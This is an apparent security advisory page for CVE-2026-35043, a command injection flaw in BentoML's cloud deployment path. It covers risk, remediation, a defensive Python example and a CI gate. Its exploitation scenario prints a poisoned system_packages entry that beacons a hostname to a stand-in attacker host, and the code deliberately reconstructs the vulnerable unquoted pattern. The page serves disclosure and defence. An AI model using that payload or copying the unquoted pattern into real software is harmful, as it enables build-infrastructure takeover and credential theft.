CVE-2026-35043: BentoML: cmd injection RCE on cloud build infra

GHSA-fgv4-6jr3-jgfw HIGH CISA: ATTEND
Published April 3, 2026
CISO Take

BentoML's incomplete patch (<=1.4.37) leaves the cloud deployment path vulnerable to command injection via bentofile.yaml system_packages, enabling RCE on BentoCloud or self-hosted Yatai build infrastructure. Any team deploying BentoML models to BentoCloud must upgrade to 1.4.38 immediately — the original fix patched the wrong code path, creating false confidence. If deployments occurred between the partial patch and 1.4.38, treat build environment credentials as compromised and rotate.

What is the risk?

HIGH risk with a deceptive twist: the incomplete fix in commit ce53491 patched images.py and Jinja2 templates but missed deployment.py:1648 — the cloud deployment path. This creates false confidence for teams who track patch commits rather than full code audits. Exploitability is trivial: a single YAML entry with a semicolon achieves shell breakout. The payload lands on build infrastructure, which typically holds container registry write credentials, cloud provider IAM tokens, and cross-tenant access, making this a high-value lateral movement pivot. Exposure is scoped to BentoCloud users and self-hosted Yatai/Kubernetes deployments; local-only builds are not affected.

What systems are affected?

Package: BentoML
Ecosystem: pip
Vulnerable Range: <= 1.4.37
Patched: 1.4.38
Package profile: 8.7K, OpenSSF 6.4, 21 dependents, pushed 12d ago, 55% patched, ~14d to patch

Do you use BentoML? You're affected.

How severe is it?

CVSS 3.1: 7.8 / 10
EPSS: 0.3% chance of exploitation in 30 days (higher than 23% of all CVEs)
Exploitation Status: Exploit Available
Exploitation: MEDIUM
Sophistication: Trivial
Exploitation Confidence: medium
CISA SSVC: Public PoC
Composite signal derived from CISA KEV, VulnCheck KEV, CISA SSVC, EPSS, Metasploit, Exploit-DB, trickest/cve, Nuclei templates, and inthewild.io exploitation reports.

What is the attack surface?

AV (Attack Vector): Local
AC (Attack Complexity): Low
PR (Privileges Required): None
UI (User Interaction): Required
S (Scope): Unchanged
C (Confidentiality): High
I (Integrity): High
A (Availability): High

What should I do?

5 steps
  1. PATCH

    Upgrade bentoml to 1.4.38 immediately — the fix adds shlex.quote() to each package in deployment.py:1648, neutralizing shell metacharacters.

  2. AUDIT

    Grep all bentofile.yaml files in repositories and CI pipelines for system_packages values containing semicolons, backticks, $(), ${IFS}, or pipe characters.

  3. DETECT

    Review BentoCloud build logs for anomalous outbound network connections or unexpected commands executing during the container setup phase.

  4. ROTATE

    If any BentoCloud deployments occurred between the partial patch (commit ce53491) and 1.4.38 release, assume build environment credentials are potentially compromised — rotate cloud API keys, registry tokens, and all secrets present in the build environment.

  5. GATE

    Add pre-deployment CI validation to reject bentofile.yaml files with system_packages values matching shell metacharacter patterns as a defense-in-depth control.

What does CISA's SSVC say?

Decision Attend
Exploitation poc
Automatable No
Technical Impact total

Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.

How is it classified?

Which compliance frameworks are affected?

This CVE is relevant to:

EU AI Act
Article 15 - Accuracy, robustness and cybersecurity
ISO 42001
A.8.2 - AI system development and supply chain
NIST AI RMF
GOVERN 6.1 - Policies and procedures for AI supply chain risk management
MANAGE 2.2 - Mechanisms to respond to and recover from AI risk events
OWASP LLM Top 10
LLM05:2025 - Supply Chain Vulnerabilities

Frequently Asked Questions

What is CVE-2026-35043?

BentoML's incomplete patch (<=1.4.37) leaves the cloud deployment path vulnerable to command injection via bentofile.yaml system_packages, enabling RCE on BentoCloud or self-hosted Yatai build infrastructure. Any team deploying BentoML models to BentoCloud must upgrade to 1.4.38 immediately — the original fix patched the wrong code path, creating false confidence. If deployments occurred between the partial patch and 1.4.38, treat build environment credentials as compromised and rotate.

Is CVE-2026-35043 actively exploited?

No confirmed active exploitation of CVE-2026-35043 has been reported, but organizations should still patch proactively.

How to fix CVE-2026-35043?

  1. PATCH: Upgrade bentoml to 1.4.38 immediately — the fix adds shlex.quote() to each package in deployment.py:1648, neutralizing shell metacharacters.
  2. AUDIT: Grep all bentofile.yaml files in repositories and CI pipelines for system_packages values containing semicolons, backticks, $(), ${IFS}, or pipe characters.
  3. DETECT: Review BentoCloud build logs for anomalous outbound network connections or unexpected commands executing during the container setup phase.
  4. ROTATE: If any BentoCloud deployments occurred between the partial patch (commit ce53491) and 1.4.38 release, assume build environment credentials are potentially compromised — rotate cloud API keys, registry tokens, and all secrets present in the build environment.
  5. GATE: Add pre-deployment CI validation to reject bentofile.yaml files with system_packages values matching shell metacharacter patterns as a defense-in-depth control.

What systems are affected by CVE-2026-35043?

This vulnerability affects the following AI/ML architecture patterns: MLOps deployment pipelines, cloud model serving, CI/CD build infrastructure, containerized model deployment.

What is the CVSS score for CVE-2026-35043?

CVE-2026-35043 has a CVSS v3.1 base score of 7.8 (HIGH). The EPSS exploitation probability is 0.32%.

What is the AI security impact?

Affected AI Architectures

MLOps deployment pipelines, cloud model serving, CI/CD build infrastructure, containerized model deployment

MITRE ATLAS Techniques

AML.T0010.001 AI Software
AML.T0025 Exfiltration via Cyber Means
AML.T0050 Command and Scripting Interpreter
AML.T0055 Unsecured Credentials
AML.T0079 Stage Capabilities

Compliance Controls Affected

EU AI Act: Article 15
ISO 42001: A.8.2
NIST AI RMF: GOVERN 6.1, MANAGE 2.2
OWASP LLM Top 10: LLM05:2025

What are the technical details?

Original Advisory

BentoML is a Python library for building online serving systems optimized for AI apps and model inference. Prior to 1.4.38, the cloud deployment path in src/bentoml/_internal/cloud/deployment.py was not included in the fix for CVE-2026-33744. Line 1648 interpolates system_packages directly into a shell command using an f-string without any quoting. The generated script is uploaded to BentoCloud as setup.sh and executed on the cloud build infrastructure during deployment, making this a remote code execution on the CI/CD tier. This vulnerability is fixed in 1.4.38.
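The following Python example is added here and is not BentoML's code or the project's patch. It reconstructs the unquoted f-string pattern the advisory describes (the exact apt-get command line, the function names and the sample package list are assumptions made for the example), shows the shlex.quote() hardening from step 1 (PATCH) of the remediation list, and implements the CI gate from step 5 (GATE) as an allowlist check over an already-parsed bentofile.yaml. The allowlisted character set is a constructed default that a team would adjust to the package specs it accepts.

```python
"""Added example (not BentoML's code): the injection pattern behind CVE-2026-35043
beside the shlex.quote() fix, plus a CI gate for bentofile.yaml system_packages."""
import re
import shlex

# Allowlist for Debian/Ubuntu package specs: a name, optionally with a version pin
# (pkg=1.2-3) or an arch qualifier (pkg:amd64). Rejecting everything outside this set
# is stricter than a denylist of metacharacters, so it also catches $(), ${IFS},
# backticks, pipes and embedded newlines. (Assumption: this is the character set
# your team accepts in system_packages; widen it deliberately if you need more.)
_PACKAGE_SPEC = re.compile(r"[a-z0-9][a-z0-9+.:~=-]*", re.IGNORECASE)


def render_install_command_unsafe(system_packages):
    """Reconstruction of the vulnerable pattern the advisory describes: the list is
    joined and interpolated with an f-string and no quoting, so a ';' inside one
    entry terminates the apt-get command and starts a second command. Hypothetical,
    for illustration only; never ship this form."""
    return f"apt-get install -y {' '.join(system_packages)}"


def render_install_command_safe(system_packages):
    """Hardened form, the same idea as the 1.4.38 fix: each entry goes through
    shlex.quote(), so a hostile entry becomes one quoted argument to apt-get
    instead of new shell syntax."""
    quoted = " ".join(shlex.quote(str(pkg)) for pkg in system_packages)
    return f"apt-get install -y {quoted}"


def find_unsafe_system_packages(bentofile):
    """CI gate (step 5): given a parsed bentofile.yaml (e.g. the dict returned by
    yaml.safe_load), return every system_packages entry that is not a plain
    package spec. An empty list means the file passes the gate."""
    packages = bentofile.get("system_packages") or []
    return [
        str(pkg)
        for pkg in packages
        if not isinstance(pkg, str) or not _PACKAGE_SPEC.fullmatch(pkg)
    ]


if __name__ == "__main__":
    # Constructed sample: three legitimate packages and one hostile entry. The hostile
    # entry only echoes a string; the point is that ';' breaks out of apt-get.
    packages = ["jq", "curl", "libgomp1", "jq; echo injected"]
    print("unsafe:", render_install_command_unsafe(packages))
    print("safe:  ", render_install_command_safe(packages))
    # With quoting, the hostile entry survives as a single argv element for apt-get.
    print("argv:  ", shlex.split(render_install_command_safe(packages)))
    bad = find_unsafe_system_packages({"service": "service:svc", "system_packages": packages})
    if bad:
        raise SystemExit(f"bentofile.yaml rejected, unsafe system_packages: {bad}")
```

In a pipeline, load each bentofile.yaml with yaml.safe_load, pass the dict to find_unsafe_system_packages(), and fail the job when the list is non-empty; the quoting functions are there to make the difference between the two code paths concrete, since the gate is a defense-in-depth control and upgrading to 1.4.38 remains the actual fix.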

Exploitation Scenario

A threat actor publishes a BentoML model to a public hub (Hugging Face, internal model registry) with a bentofile.yaml containing a poisoned system_packages entry: 'jq;curl${IFS}https://c2.attacker.com/beacon?h=$(hostname|base64)${IFS}#'. When a target organization's MLOps engineer deploys this bento to BentoCloud, BentoML generates a setup.sh with the injected command, uploads it via the legitimate deployment API, and the cloud build node executes it during container initialization. The attacker receives a beacon from the build node, then uses the established callback to enumerate and exfiltrate container registry credentials and cloud IAM tokens from the build environment. With registry write access, the attacker can poison downstream container images, achieving persistent supply chain compromise across the victim's AI deployment pipeline.

Weaknesses (CWE)

CWE-78 — Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection'): The product constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component.

  • [Architecture and Design] If at all possible, use library calls rather than external processes to recreate the desired functionality.
  • [Architecture and Design, Operation] Run the code in a "jail" or similar sandbox environment that enforces strict boundaries between the process and the operating system. This may effectively restrict which files can be accessed in a particular directory or which commands can be executed by the software. OS-level examples include the Unix chroot jail, AppArmor, and SELinux. In general, managed code may provide some protection. For example, java.io.FilePermission in the Java SecurityManager allows the software to specify restrictions on file operations. This may not be a feasible solution, and it only limits the impact to the operating system; the rest of the application may still be subject to compromise. Be careful to avoid CWE-243 and other weaknesses related to jails.

Source: MITRE CWE corpus.

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Timeline

Published
April 3, 2026
Last Modified
April 7, 2026
First Seen
April 4, 2026
